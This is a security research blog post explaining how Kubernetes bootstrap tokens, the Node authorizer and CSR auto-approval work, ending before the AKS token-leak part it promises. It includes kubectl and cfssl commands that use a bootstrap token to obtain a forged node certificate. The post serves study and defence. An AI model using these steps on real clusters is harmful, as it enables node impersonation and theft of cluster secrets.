So I became a node: exploiting bootstrap tokens in Azure Kubernetes Service

During one of our assessments, we managed to retrieve a Kubernetes bootstrap token from an AKS pod. It was a good opportunity to take a closer look at these tokens, how they work and how to exploit them. In this first blog post, we will describe the inner workings of bootstrap tokens, the Node authorization mode, signers and certificate controllers. Then we will show how to exploit a pod sharing the host network namespace in an AKS environment to leak such a token. The information provided in this blog post is based on Kubernetes v1.28 and may differ in other versions.


TLS Everywhere

In a Kubernetes cluster, all communications are encrypted and authenticated with TLS: between the control plane and the API server, between the API server and Kubelets, between the API server and the etcd database, and even to authenticate users. If you have already deployed a cluster manually, you know that provisioning each certificate is tedious. Before exploring how we can manage them directly with Kubernetes, we will quickly explain how certificate authentication and the Node authorization mode work.

Authentication and Node authorization mode

Certificate authentication in a Kubernetes cluster is quite simple. All information on the user is contained inside the certificate:

- The username is stored in the common name.

- The groups, if any, are stored in the organization fields.

Let's take an example. The following certificate is extracted from a kubeconfig retrieved with the az CLI:

$ az aks get-credentials --resource-group bootstrap-token --name cluster -f - | grep client-certificate-data | cut -d " " -f 6 | base64 -d | openssl x509 -noout -text

Certificate:

Data:

[...]

Issuer: CN = ca

Validity

Not Before: Mar 12 15:50:04 2024 GMT

Not After : Mar 12 16:00:04 2026 GMT

Subject: O = system:masters, CN = masterclient

Subject Public Key Info:

Public Key Algorithm: rsaEncryption

[...]

This certificate allows authenticating as the masterclient user with the system:masters group. This can be verified with the kubectl CLI:

$ kubectl auth whoami

ATTRIBUTE VALUE

Username masterclient

Groups [system:masters system:authenticated]

Note the system:authenticated group, which is added automatically to any request that passes some form of authentication.
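The mapping from certificate fields to identity can be sketched in a few lines of Go. This is only an illustration of the rule described above (CN gives the username, O gives the groups), not the API server's code; the helper names `identityFromPEM` and `selfSignedPEM` are made up for the example, and the certificate is a throwaway self-signed one rather than one issued by a cluster CA.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"encoding/pem"
	"errors"
	"fmt"
	"math/big"
	"time"
)

// identityFromPEM returns the username (subject CN) and groups (subject O)
// carried by a PEM-encoded client certificate.
func identityFromPEM(certPEM []byte) (string, []string, error) {
	block, _ := pem.Decode(certPEM)
	if block == nil || block.Type != "CERTIFICATE" {
		return "", nil, errors.New("no PEM certificate found")
	}
	cert, err := x509.ParseCertificate(block.Bytes)
	if err != nil {
		return "", nil, err
	}
	return cert.Subject.CommonName, cert.Subject.Organization, nil
}

// selfSignedPEM builds a throwaway self-signed certificate for the demo only.
func selfSignedPEM(cn string, orgs []string) ([]byte, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, err
	}
	tmpl := &x509.Certificate{
		SerialNumber: big.NewInt(1),
		Subject:      pkix.Name{CommonName: cn, Organization: orgs},
		NotBefore:    time.Now().Add(-time.Minute),
		NotAfter:     time.Now().Add(time.Hour),
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &key.PublicKey, key)
	if err != nil {
		return nil, err
	}
	return pem.EncodeToMemory(&pem.Block{Type: "CERTIFICATE", Bytes: der}), nil
}

func main() {
	certPEM, err := selfSignedPEM("masterclient", []string{"system:masters"})
	if err != nil {
		panic(err)
	}
	user, groups, err := identityFromPEM(certPEM)
	if err != nil {
		panic(err)
	}
	fmt.Println("Username:", user)
	fmt.Println("Groups:", groups)
}
```

The system:authenticated group does not appear here because it is not stored in the certificate: the API server adds it after authentication succeeds.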

The username and groups are used to determine the privileges of the user, usually through the RBAC authorization mode. RBAC combines privileges inside Roles (or ClusterRoles) and assigns them to identities (users, service accounts or groups) with RoleBindings (or ClusterRoleBindings). This is not an article about role management in Kubernetes, so we will not go into more detail about RBAC (see the Kubernetes documentation). Instead, we will take a look at the Node authorization mode, as it will be useful later.

Identities used by Kubelets can be treated differently if this mode is enabled in the API server by passing the Node value to the authorization-mode parameter alongside other modes, as --authorization-mode=Node,RBAC. This parameter is an ordered list where each mode is evaluated one after another. If the authorizer being evaluated produces a decision, either to accept or to deny the action, other authorizers down the road will not be evaluated. If no decision is made, the action will be denied by default.
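The evaluation order described above can be modelled with a short Go sketch. It is a simplified illustration, not the API server's implementation: the `Decision`, `Request` and `Authorizer` types and the two toy authorizers `nodeLike` and `rbacLike` are hypothetical names introduced for the example.

```go
package main

import (
	"fmt"
	"strings"
)

// Decision is what a single authorizer can answer for a request.
type Decision int

const (
	NoOpinion Decision = iota
	Allow
	Deny
)

// Request is a heavily simplified stand-in for the request attributes.
type Request struct {
	User, Verb, Resource string
}

// Authorizer is a hypothetical, minimal authorizer signature.
type Authorizer func(Request) Decision

// authorize walks the ordered chain: the first authorizer that returns
// Allow or Deny wins, and a request nobody has an opinion on is denied.
func authorize(chain []Authorizer, req Request) bool {
	for _, a := range chain {
		switch a(req) {
		case Allow:
			return true
		case Deny:
			return false
		}
	}
	return false
}

// nodeLike is a toy stand-in for the Node authorizer.
func nodeLike(req Request) Decision {
	if strings.HasPrefix(req.User, "system:node:") && req.Verb == "get" && req.Resource == "nodes" {
		return Allow
	}
	return NoOpinion
}

// rbacLike is a toy stand-in for RBAC: one hard-coded privileged user.
func rbacLike(req Request) Decision {
	if req.User == "masterclient" {
		return Allow
	}
	return NoOpinion
}

func main() {
	chain := []Authorizer{nodeLike, rbacLike} // mirrors --authorization-mode=Node,RBAC
	for _, req := range []Request{
		{"system:node:demo", "get", "nodes"},
		{"masterclient", "delete", "pods"},
		{"system:anonymous", "get", "secrets"},
	} {
		fmt.Printf("%s %s %s: allowed=%v\n", req.User, req.Verb, req.Resource, authorize(chain, req))
	}
}
```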

The Node authorization mode checks if the identity performing an action is a node: the username must start with system:node: and be within the system:nodes group.

// From https://github.com/kubernetes/kubernetes/blob/21db079e14fe1f48c75b923ab9635f7dbf2a86ce/pkg/auth/nodeidentifier/default.go#L39

// NodeIdentity returns isNode=true if the user groups contain the system:nodes

// group and the user name matches the format system:node:<nodeName>, and

// populates nodeName if isNode is true

func (defaultNodeIdentifier) NodeIdentity(u user.Info) (string, bool) {

// Make sure we're a node, and can parse the node name

if u == nil {

return "", false

}

userName := u.GetName()

if !strings.HasPrefix(userName, nodeUserNamePrefix) { // nodeUserNamePrefix = "system:node:"

return "", false

}

isNode := false

for _, g := range u.GetGroups() {

if g == user.NodesGroup { // NodesGroup = "system:nodes"

isNode = true

break

}

}

if !isNode {

return "", false

}

nodeName := strings.TrimPrefix(userName, nodeUserNamePrefix)

return nodeName, true

}

The Authorize function calls this check first and, if the identity is a node, verifies the action the node is trying to perform.

// From https://github.com/kubernetes/kubernetes/blob/21db079e14fe1f48c75b923ab9635f7dbf2a86ce/plugin/pkg/auth/authorizer/node/node_authorizer.go#L96C1-L142C2

func (r *NodeAuthorizer) Authorize(ctx context.Context, attrs authorizer.Attributes) (authorizer.Decision, string, error) {

nodeName, isNode := r.identifier.NodeIdentity(attrs.GetUser())

if !isNode {

// reject requests from non-nodes

return authorizer.DecisionNoOpinion, "", nil

}

if len(nodeName) == 0 {

// reject requests from unidentifiable nodes

klog.V(2).Infof("NODE DENY: unknown node for user %q", attrs.GetUser().GetName())

return authorizer.DecisionNoOpinion, fmt.Sprintf("unknown node for user %q", attrs.GetUser().GetName()), nil

}

// subdivide access to specific resources

if attrs.IsResourceRequest() {

requestResource := schema.GroupResource{Group: attrs.GetAPIGroup(), Resource: attrs.GetResource()}

switch requestResource {

case secretResource:

return r.authorizeReadNamespacedObject(nodeName, secretVertexType, attrs)

case configMapResource:

return r.authorizeReadNamespacedObject(nodeName, configMapVertexType, attrs)

case pvcResource:

if attrs.GetSubresource() == "status" {

return r.authorizeStatusUpdate(nodeName, pvcVertexType, attrs)

}

return r.authorizeGet(nodeName, pvcVertexType, attrs)

case pvResource:

return r.authorizeGet(nodeName, pvVertexType, attrs)

case resourceClaimResource:

return r.authorizeGet(nodeName, resourceClaimVertexType, attrs)

case vaResource:

return r.authorizeGet(nodeName, vaVertexType, attrs)

case svcAcctResource:

return r.authorizeCreateToken(nodeName, serviceAccountVertexType, attrs)

case leaseResource:

return r.authorizeLease(nodeName, attrs)

case csiNodeResource:

return r.authorizeCSINode(nodeName, attrs)

}

}

// Access to other resources is not subdivided, so just evaluate against the statically defined node rules

if rbac.RulesAllow(attrs, r.nodeRules...) {

return authorizer.DecisionAllow, "", nil

}

return authorizer.DecisionNoOpinion, "", nil

}

After checking that the node name is not empty, it performs additional verifications for secrets, configmaps, persistent volume claims, persistent volumes, resource claims, volume attachments, service accounts, leases and csinodes. These checks mostly consist of verifying that the targeted resource is linked to the node in some way. For other resources, the action is checked against a static list of node rules (the nodeRules passed to rbac.RulesAllow above).

So in a properly configured cluster, a node can only access or modify resources that are linked to itself, such as pods running on it or secrets mounted inside such a pod. This restricts the possibilities of an attacker having compromised a node's certificate, but as we will demonstrate, retrieving secrets and service accounts available to a single node is often enough to compromise the whole cluster.
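To make the "linked to the node" idea concrete, here is a deliberately tiny Go model. It is only a toy: the real authorizer maintains a graph of nodes, pods and the objects they reference, whereas this sketch uses a flat list, ignores namespaces, and the `pod` type and `nodeCanReadSecret` function are invented for the illustration.

```go
package main

import "fmt"

// pod records where a pod is scheduled and which secrets it mounts.
type pod struct {
	Name    string
	Node    string
	Secrets []string
}

// nodeCanReadSecret reports whether at least one pod scheduled on nodeName
// references the secret, which is the kind of relationship the Node
// authorizer looks for before letting a node read it.
func nodeCanReadSecret(pods []pod, nodeName, secret string) bool {
	for _, p := range pods {
		if p.Node != nodeName {
			continue
		}
		for _, s := range p.Secrets {
			if s == secret {
				return true
			}
		}
	}
	return false
}

func main() {
	pods := []pod{
		{Name: "web", Node: "node-a", Secrets: nil},
		{Name: "db", Node: "node-b", Secrets: []string{"db-password"}},
	}
	for _, node := range []string{"node-a", "node-b", "unknown-node"} {
		fmt.Printf("%s can read db-password: %v\n", node, nodeCanReadSecret(pods, node, "db-password"))
	}
}
```

In this model, an attacker holding a certificate for node-a learns nothing about db-password, while a certificate for node-b is enough to read it.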

Certificate signature

To be functional, the Node authorization mode requires each node to have a dedicated certificate with a valid name. Provisioning these certificates can be difficult, which is why Kubernetes provides a built-in way to sign and distribute them: the CertificateSigningRequest (CSR) resource. A certificate signing request is created as an object in the cluster, so that it can be approved and signed automatically if it meets certain conditions, or manually by a user with the required privileges.



This is the mechanism that you may have used to grant access to a user on an on-premise cluster. The Kubernetes documentation about this mechanism is quite dense, but the basic workflow is the following:

After that process, the new entity can authenticate to the API server with the username and groups defined inside the certificate.

However, according to the documentation, the create, get, list and watch rights on certificatesigningrequests are required to create a CSR and retrieve the signed certificate. Granting these privileges to unauthenticated users is not acceptable, as it could lead to malicious certificates being signed by mistake. An identity with these rights should therefore only be created and handed out when needed, and this is where bootstrap tokens come into play.

One Token to rule them all

Bootstrap tokens were introduced back in Kubernetes v1.6.0 released in 2017 and have been used by the kubeadm tool ever since. They serve two purposes: first, they allow authenticating to the API server with the needed rights to create a CSR and retrieve the signed certificate and secondly, they can be used to authenticate the API server during the first connection of a new node.

A bootstrap token is stored as a Secret in the kube-system namespace of the cluster. This is the example found in the documentation:

apiVersion: v1

kind: Secret

metadata:

# Name MUST be of form "bootstrap-token-<token id>"

name: bootstrap-token-07401b

namespace: kube-system

# Type MUST be 'bootstrap.kubernetes.io/token'

type: bootstrap.kubernetes.io/token

stringData:

# Human readable description. Optional.

description: "The default bootstrap token generated by 'kubeadm init'."

# Token ID and secret. Required.

token-id: 07401b

token-secret: f395accd246ae52d

# Expiration. Optional.

expiration: 2017-03-10T03:22:11Z

# Allowed usages.

usage-bootstrap-authentication: "true"

usage-bootstrap-signing: "true"

# Extra groups to authenticate the token as. Must start with "system:bootstrappers:"

auth-extra-groups: system:bootstrappers:worker,system:bootstrappers:ingress

The bootstrap token is the combination of the token-id and the token-secret, joined by a dot. Here, the token is 07401b.f395accd246ae52d.
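As a small illustration, the following Go sketch splits a token into its two parts and derives the name of the Secret that stores it, as well as the username the API server assigns to it (system:bootstrap:<token id>). The pattern assumes the documented format of a 6-character ID and a 16-character secret made of lowercase letters and digits; the `BootstrapToken` type and its methods are hypothetical helpers, not part of any Kubernetes library.

```go
package main

import (
	"fmt"
	"regexp"
)

// tokenPattern matches "<6-char id>.<16-char secret>", lowercase alphanumerics.
var tokenPattern = regexp.MustCompile(`^([a-z0-9]{6})\.([a-z0-9]{16})$`)

// BootstrapToken holds the public ID and the secret part of a token.
type BootstrapToken struct {
	ID, Secret string
}

// parseBootstrapToken splits a token string into its ID and secret.
func parseBootstrapToken(s string) (BootstrapToken, error) {
	m := tokenPattern.FindStringSubmatch(s)
	if m == nil {
		return BootstrapToken{}, fmt.Errorf("token is not of the form <id>.<secret>")
	}
	return BootstrapToken{ID: m[1], Secret: m[2]}, nil
}

// SecretName is the name of the kube-system Secret backing the token.
func (t BootstrapToken) SecretName() string { return "bootstrap-token-" + t.ID }

// Username is the identity obtained when authenticating with the token.
func (t BootstrapToken) Username() string { return "system:bootstrap:" + t.ID }

func main() {
	tok, err := parseBootstrapToken("07401b.f395accd246ae52d")
	if err != nil {
		panic(err)
	}
	fmt.Println("secret name:", tok.SecretName())
	fmt.Println("username:   ", tok.Username())
}
```

Only the ID is meant to be public: it appears in the Secret name and in the username, while the secret part must stay confidential.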

To illustrate how they are used, we will focus on the kubeadm workflow when adding a new node.

The kubeadm flow

When using kubeadm, adding a new node in the cluster is as simple as one command:

$ kubeadm join <Api server ip:port> --token <bootstrap token>

We must provide a bootstrap token which can also be created with kubeadm:

$ kubeadm token create

In a kubeadm deployment, the bootstrap token is used for authenticating both the API server and the new node.

Authentication of the API server

For the API server authentication, a config map named cluster-info is created in the kube-public namespace by kubeadm when configuring the control plane:

$ kubectl get configmap -n kube-public cluster-info -o yaml

apiVersion: v1

data:

jws-kubeconfig-plme7f: eyJhbGciOiJIUzI1NiIsImtpZCI6InBsbWU3ZiJ9..Mlf5OAcLDmt8_t6u1QmZ0eAjKB9bu5h2mbbouw_7OrE

kubeconfig: |

apiVersion: v1

clusters:

- cluster:

certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0[...]ZJQ0FURS0tLS0tCg==

server: https://control-plane.minikube.internal:8443

name: ""

contexts: null

current-context: ""

kind: Config

preferences: {}

users: null

kind: ConfigMap

metadata:

creationTimestamp: "2024-03-14T15:59:00Z"

name: cluster-info

namespace: kube-public

resourceVersion: "339"

uid: 6abe30ac-0cfe-411c-9291-728ecc6d5ac0

It contains the cluster API server address and the CA used by the cluster. A Role and a RoleBinding in the kube-public namespace are also created to allow anonymous users to retrieve it:

$ kubectl get role,rolebinding -n kube-public -o wide

NAME CREATED AT

role.rbac.authorization.k8s.io/kubeadm:bootstrap-signer-clusterinfo 2024-03-14T15:59:00Z

role.rbac.authorization.k8s.io/system:controller:bootstrap-signer 2024-03-14T15:58:58Z

NAME ROLE AGE USERS GROUPS SERVICEACCOUNTS

rolebinding.rbac.authorization.k8s.io/kubeadm:bootstrap-signer-clusterinfo Role/kubeadm:bootstrap-signer-clusterinfo 74m system:anonymous

rolebinding.rbac.authorization.k8s.io/system:controller:bootstrap-signer Role/system:controller:bootstrap-signer 74m kube-system/bootstrap-signer

$ kubectl get role -n kube-public kubeadm:bootstrap-signer-clusterinfo -o yaml

apiVersion: rbac.authorization.k8s.io/v1

kind: Role

metadata:

creationTimestamp: "2024-03-14T15:59:00Z"

name: kubeadm:bootstrap-signer-clusterinfo

namespace: kube-public

resourceVersion: "232"

uid: f31a40f8-a362-44ab-94fe-72aef202e723

rules:

- apiGroups:

- ""

resourceNames:

- cluster-info

resources:

- configmaps

verbs:

- get

It is then possible to access it with a simple HTTP request to the API server:

$ curl https://192.168.49.2:8443/api/v1/namespaces/kube-public/configmaps/cluster-info -k

{

"kind": "ConfigMap",

"apiVersion": "v1",

"metadata": {

"name": "cluster-info",

"namespace": "kube-public",

"uid": "6abe30ac-0cfe-411c-9291-728ecc6d5ac0",

[...]

{

"manager": "kube-controller-manager",

"operation": "Update",

"apiVersion": "v1",

"time": "2024-03-14T15:59:12Z",

"fieldsType": "FieldsV1",

"fieldsV1": {

"f:data": {

"f:jws-kubeconfig-plme7f": {}

}

}

}

]

},

"data": {

"jws-kubeconfig-plme7f": "eyJhbGciOiJIUzI1NiIsImtpZCI6InBsbWU3ZiJ9..Mlf5OAcLDmt8_t6u1QmZ0eAjKB9bu5h2mbbouw_7OrE",

"kubeconfig": "apiVersion: v1\nclusters:\n- cluster:\n certificate-authority-data: LS0tLS1CRUdJTiB[...]S0tLS0tCg==\n server: https://control-plane.minikube.internal:8443\n name: \"\"\ncontexts: null\ncurrent-context: \"\"\nkind: Config\npreferences: {}\nusers: null\n"

}

}%

We can observe the presence of the jws-kubeconfig-XXXXXX field. It is added by a signer, which signs the whole kubeconfig field with the secret part of a bootstrap token.

func (e *Signer) signConfigMap(ctx context.Context) {

origCM := e.getConfigMap()

[...]

newCM := origCM.DeepCopy()

// First capture the config we are signing

content, ok := newCM.Data[bootstrapapi.KubeConfigKey]

[...]

// Now recompute signatures and store them on the new map

tokens := e.getTokens(ctx)

for tokenID, tokenValue := range tokens {

sig, err := jws.ComputeDetachedSignature(content, tokenID, tokenValue)

if err != nil {

utilruntime.HandleError(err)

}

// Check to see if this signature is changed or new.

oldSig, _ := sigs[tokenID]

if sig != oldSig {

needUpdate = true

}

delete(sigs, tokenID)

newCM.Data[bootstrapapi.JWSSignatureKeyPrefix+tokenID] = sig

}

// If we have signatures left over we know that some signatures were

// removed. We now need to update the ConfigMap

if len(sigs) != 0 {

needUpdate = true

}

if needUpdate {

e.updateConfigMap(ctx, newCM)

}

}

The ID part is used in the name of the JWS (here plme7f) for the client to match the right JWS with the bootstrap token they were provided with.

kubeadm verifies the signature to confirm that the server knows the secret part of the bootstrap token. If valid, the CA in the config map will be trusted. The new client will communicate through TLS with the API server, authenticating itself with the bootstrap token to create its CSR.
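The verification performed on the client side can be approximated with the Go standard library. This sketch assumes a standard compact JWS using HS256, with the token secret as HMAC key, the token ID as `kid`, and the kubeconfig content as the detached payload. It is not kubeadm's code, and `signDetached` and `verifyDetached` are names chosen for the example.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha256"
	"encoding/base64"
	"errors"
	"fmt"
	"strings"
)

var b64 = base64.RawURLEncoding

// signDetached builds "<header>..<signature>": an HS256 JWS whose payload
// has been removed from the compact serialization.
func signDetached(content, tokenID, tokenSecret string) string {
	header := b64.EncodeToString([]byte(`{"alg":"HS256","kid":"` + tokenID + `"}`))
	mac := hmac.New(sha256.New, []byte(tokenSecret))
	mac.Write([]byte(header + "." + b64.EncodeToString([]byte(content))))
	return header + ".." + b64.EncodeToString(mac.Sum(nil))
}

// verifyDetached re-attaches the content and checks the HMAC with the
// secret part of the bootstrap token.
func verifyDetached(detached, content, tokenSecret string) error {
	parts := strings.Split(detached, ".")
	if len(parts) != 3 || parts[1] != "" {
		return errors.New("not a detached compact JWS")
	}
	want, err := b64.DecodeString(parts[2])
	if err != nil {
		return err
	}
	mac := hmac.New(sha256.New, []byte(tokenSecret))
	mac.Write([]byte(parts[0] + "." + b64.EncodeToString([]byte(content))))
	if !hmac.Equal(mac.Sum(nil), want) {
		return errors.New("signature mismatch")
	}
	return nil
}

func main() {
	kubeconfig := "apiVersion: v1\nkind: Config\n" // placeholder content
	sig := signDetached(kubeconfig, "plme7f", "f0ivgh048jtzlild")
	fmt.Println("jws-kubeconfig-plme7f:", sig)
	fmt.Println("right secret:", verifyDetached(sig, kubeconfig, "f0ivgh048jtzlild"))
	fmt.Println("wrong secret:", verifyDetached(sig, kubeconfig, "aaaaaaaaaaaaaaaa"))
}
```

The header produced for the ID plme7f is the same base64url string as the first part of the jws-kubeconfig-plme7f value shown earlier. The signature part differs, since the kubeconfig used here is only a placeholder.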

Client authentication and certificate signing

To authenticate with a bootstrap token, we can use the --token parameter in kubectl:

$ kubectl --token plme7f.f0ivgh048jtzlild auth whoami --kubeconfig /dev/null --server=https://192.168.49.2:8443 --insecure-skip-tls-verify

ATTRIBUTE VALUE

Username system:bootstrap:plme7f

Groups [system:bootstrappers system:bootstrappers:kubeadm:default-node-token system:authenticated]

The default system:bootstrappers group is always added when authenticating with a bootstrap token. The system:bootstrappers:kubeadm:default-node-token group comes from the auth-extra-groups field added by kubeadm when creating the token.

These groups are associated with three ClusterRoles:

$ kubectl get clusterrolebinding -o wide | grep bootstrap

kubeadm:get-nodes ClusterRole/kubeadm:get-nodes 16m system:bootstrappers:kubeadm:default-node-token

kubeadm:kubelet-bootstrap ClusterRole/system:node-bootstrapper 16m system:bootstrappers:kubeadm:default-node-token

kubeadm:node-autoapprove-bootstrap ClusterRole/system:certificates.k8s.io:certificatesigningrequests:nodeclient 16m system:bootstrappers:kubeadm:default-node-token

These ClusterRoles grant the following permissions, which allow creating a CSR and retrieving signed certificates:

$ kubectl --token plme7f.f0ivgh048jtzlild auth can-i --list --kubeconfig /dev/null --server=https://192.168.49.2:8443 --insecure-skip-tls-verify

Resources Non-Resource URLs Resource Names Verbs

certificatesigningrequests.certificates.k8s.io [] [] [create get list watch]

certificatesigningrequests.certificates.k8s.io/nodeclient [] [] [create]

Once created, a CSR must be approved before being signed. In the case of a node certificate, this is done automatically by the CSRApprovingController, which runs as a goroutine launched by the controller-manager:

//From https://github.com/kubernetes/kubernetes/blob/4175ca0c5e4242bc3a131e63f2c14de499aac54c/cmd/kube-controller-manager/app/certificates.go#L151

func startCSRApprovingController(ctx context.Context, controllerContext ControllerContext) (controller.Interface, bool, error) {

approver := approver.NewCSRApprovingController(

ctx,

controllerContext.ClientBuilder.ClientOrDie("certificate-controller"),

controllerContext.InformerFactory.Certificates().V1().CertificateSigningRequests(),

)

go approver.Run(ctx, 5)

return nil, true, nil

}

When receiving a new CSR, several checks will be performed by the CSRApprovingController. First, it verifies that the CSR contains a valid Kubelet certificate:

func ValidateKubeletClientCSR(req *x509.CertificateRequest, usages sets.String) error {

if !reflect.DeepEqual([]string{"system:nodes"}, req.Subject.Organization) {

return organizationNotSystemNodesErr

}

if len(req.DNSNames) > 0 {

return dnsSANNotAllowedErr

}

if len(req.EmailAddresses) > 0 {

return emailSANNotAllowedErr

}

if len(req.IPAddresses) > 0 {

return ipSANNotAllowedErr

}

if len(req.URIs) > 0 {

return uriSANNotAllowedErr

}

if !strings.HasPrefix(req.Subject.CommonName, "system:node:") {

return commonNameNotSystemNode

}

if !kubeletClientRequiredUsages.Equal(usages) && !kubeletClientRequiredUsagesNoRSA.Equal(usages) {

return fmt.Errorf("usages did not match %v", kubeletClientRequiredUsages.List())

}

return nil

}

In particular, the following conditions should be met:

- The certificate's Organization field must be system:nodes.

- No SAN field (DNS, email, IP or URI) must be provided.

- The commonName must start with system:node:.

- The certificate usages are client auth, digital signature and optionally key encipherment.

Lastly, the controller checks if the creator has the create privilege over certificatesigningrequests.certificates.k8s.io/nodeclient, which is the case in our example.

func (a *sarApprover) authorize(ctx context.Context, csr *capi.CertificateSigningRequest, rattrs authorization.ResourceAttributes) (bool, error) {

extra := make(map[string]authorization.ExtraValue)

for k, v := range csr.Spec.Extra {

extra[k] = authorization.ExtraValue(v)

}

sar := &authorization.SubjectAccessReview{

Spec: authorization.SubjectAccessReviewSpec{

User: csr.Spec.Username,

UID: csr.Spec.UID,

Groups: csr.Spec.Groups,

Extra: extra,

ResourceAttributes: &rattrs,

},

}

sar, err := a.client.AuthorizationV1().SubjectAccessReviews().Create(ctx, sar, metav1.CreateOptions{})

if err != nil {

return false, err

}

return sar.Status.Allowed, nil

}

Thus, we can create a CSR matching these criteria:

$ cat << EOF | cfssl genkey - | cfssljson -bare demo

{

"CN": "system:node:bootstap-demo",

"key": {

"algo": "rsa",

"size": 2048

},

"names": [

{

"O": "system:nodes"

}

]

}

EOF
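For readers who prefer not to depend on cfssl, an equivalent CSR can be produced with the Go standard library. This is a sketch under the same assumptions as the command above (RSA 2048, CN prefixed with system:node:, O set to system:nodes); `newNodeCSR` and `subjectOf` are illustrative helper names.

```go
package main

import (
	"crypto/rand"
	"crypto/rsa"
	"crypto/x509"
	"crypto/x509/pkix"
	"encoding/pem"
	"errors"
	"fmt"
)

// newNodeCSR generates an RSA key and a PEM-encoded CSR whose subject has
// the shape expected for a kubelet client certificate.
func newNodeCSR(nodeName string) ([]byte, *rsa.PrivateKey, error) {
	key, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		return nil, nil, err
	}
	tmpl := &x509.CertificateRequest{
		Subject: pkix.Name{
			CommonName:   "system:node:" + nodeName,
			Organization: []string{"system:nodes"},
		},
		// No DNS, email, IP or URI SANs: the approver rejects them.
	}
	der, err := x509.CreateCertificateRequest(rand.Reader, tmpl, key)
	if err != nil {
		return nil, nil, err
	}
	csrPEM := pem.EncodeToMemory(&pem.Block{Type: "CERTIFICATE REQUEST", Bytes: der})
	return csrPEM, key, nil
}

// subjectOf parses a PEM CSR back and returns its CN and O fields.
func subjectOf(csrPEM []byte) (string, []string, error) {
	block, _ := pem.Decode(csrPEM)
	if block == nil {
		return "", nil, errors.New("no PEM block found")
	}
	csr, err := x509.ParseCertificateRequest(block.Bytes)
	if err != nil {
		return "", nil, err
	}
	if err := csr.CheckSignature(); err != nil {
		return "", nil, err
	}
	return csr.Subject.CommonName, csr.Subject.Organization, nil
}

func main() {
	csrPEM, _, err := newNodeCSR("demo")
	if err != nil {
		panic(err)
	}
	cn, orgs, err := subjectOf(csrPEM)
	if err != nil {
		panic(err)
	}
	fmt.Printf("CN=%s O=%v\n%s", cn, orgs, csrPEM)
}
```

The PEM output plays the role of the demo.csr file: base64-encoded, it can be placed in the request field of a CertificateSigningRequest object.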

Then we send the CSR to the API server using the bootstrap token:

$ cat << EOF | kubectl --token rl7zzz.9syjb7v5mzkq79x3 --insecure-skip-tls-verify --server=https://192.168.49.2:8443 apply -f -

apiVersion: certificates.k8s.io/v1

kind: CertificateSigningRequest

metadata:

name: demo

spec:

signerName: kubernetes.io/kube-apiserver-client-kubelet

request: $(cat demo.csr| base64 | tr -d '\n')

usages:

- digital signature

- key encipherment

- client auth

EOF

certificatesigningrequest.certificates.k8s.io/demo created

As all conditions are met, it is auto-approved:

$ kubectl --insecure-skip-tls-verify --token rl7zzz.9syjb7v5mzkq79x3 --kubeconfig /dev/null --server=https://192.168.49.2:8443 get csr

NAME AGE SIGNERNAME REQUESTOR REQUESTEDDURATION CONDITION

demo 23s kubernetes.io/kube-apiserver-client-kubelet system:bootstrap:rl7zzz <none> Approved,Issued

Moreover, the CSR is signed as soon as it has been approved. This is due to another kind of controller: a signer.

A signer is the abstraction of the components or mechanisms responsible for signing certificates with their private key. Several signers are built in and, in most cases, they are controllers in the controller-manager. They monitor CSRs and sign the approved ones that meet their criteria. The signer we are interested in is kube-apiserver-client-kubelet, which is responsible for signing Kubelets' certificates.
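Conceptually, the signing step boils down to turning a CSR into a client certificate with the CA key. The following Go sketch shows that operation in isolation, with a throwaway CA standing in for the cluster CA. It is not the controller's code: `newCA`, `demoCSR` and `signClientCSR` are hypothetical helpers, and approval and policy checks are deliberately left out.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"time"
)

// newCA creates a throwaway self-signed CA standing in for the cluster CA.
func newCA() (*x509.Certificate, *ecdsa.PrivateKey, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, nil, err
	}
	tmpl := &x509.Certificate{
		SerialNumber:          big.NewInt(1),
		Subject:               pkix.Name{CommonName: "ca"},
		NotBefore:             time.Now().Add(-time.Minute),
		NotAfter:              time.Now().Add(24 * time.Hour),
		IsCA:                  true,
		BasicConstraintsValid: true,
		KeyUsage:              x509.KeyUsageCertSign,
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &key.PublicKey, key)
	if err != nil {
		return nil, nil, err
	}
	cert, err := x509.ParseCertificate(der)
	return cert, key, err
}

// demoCSR returns a DER-encoded CSR for a fresh key and a node-style subject.
func demoCSR(cn string) ([]byte, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, err
	}
	subject := pkix.Name{CommonName: cn, Organization: []string{"system:nodes"}}
	return x509.CreateCertificateRequest(rand.Reader, &x509.CertificateRequest{Subject: subject}, key)
}

// signClientCSR copies the subject and public key of the CSR into a client
// certificate signed by the CA.
func signClientCSR(csrDER []byte, ca *x509.Certificate, caKey *ecdsa.PrivateKey, ttl time.Duration) (*x509.Certificate, error) {
	csr, err := x509.ParseCertificateRequest(csrDER)
	if err != nil {
		return nil, err
	}
	if err := csr.CheckSignature(); err != nil {
		return nil, err
	}
	tmpl := &x509.Certificate{
		SerialNumber: big.NewInt(2), // a real signer would use a random serial
		Subject:      csr.Subject,
		NotBefore:    time.Now().Add(-time.Minute),
		NotAfter:     time.Now().Add(ttl),
		KeyUsage:     x509.KeyUsageDigitalSignature,
		ExtKeyUsage:  []x509.ExtKeyUsage{x509.ExtKeyUsageClientAuth},
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, ca, csr.PublicKey, caKey)
	if err != nil {
		return nil, err
	}
	return x509.ParseCertificate(der)
}

func main() {
	ca, caKey, err := newCA()
	if err != nil {
		panic(err)
	}
	csrDER, err := demoCSR("system:node:demo")
	if err != nil {
		panic(err)
	}
	cert, err := signClientCSR(csrDER, ca, caKey, time.Hour)
	if err != nil {
		panic(err)
	}
	fmt.Println("subject:", cert.Subject.CommonName, cert.Subject.Organization)
	fmt.Println("signed by CA:", cert.CheckSignatureFrom(ca) == nil)
}
```

The important point is that the signer trusts the subject written in the CSR: whoever gets a request approved decides which node name ends up in the certificate.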

